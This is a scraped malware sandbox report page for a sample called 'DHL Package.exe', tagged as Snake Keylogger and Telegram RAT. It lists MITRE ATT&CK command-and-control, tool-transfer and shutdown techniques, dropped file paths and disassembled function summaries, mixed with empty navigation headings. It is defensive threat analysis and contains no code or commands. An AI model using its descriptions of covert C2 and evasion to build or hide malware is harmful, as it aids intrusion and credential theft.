Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL Package.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Threatname: Telegram RAT

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\LangDLL.dll

C:\Users\user\AppData\Local\Temp\nsl98D6.tmp\System.dll

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Contingency.Lac

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Opspring.dia

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Overfamiliarly.lit

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\Spagfrdigst.Swe

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\cuddled.txt

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\nsec.tar

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\piggy.riv

C:\Users\user\AppData\Local\peggle\Dilettantkomediers\produktionskden.slu

Static File Info

General

File Icon

Windows Analysis Report
DHL Package.exe

Function 0040348F Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 00405582 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Function 00405AED Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Function 00403E58 Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Function 00403AAA Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 00403015 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 181
memoryCOMMON

Function 00406418 Relevance: 19.5, APIs: 7, Strings: 4, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 00405443 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Function 00405912 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Function 00406760 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 0040324C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Function 00405F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Function 00402E41 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre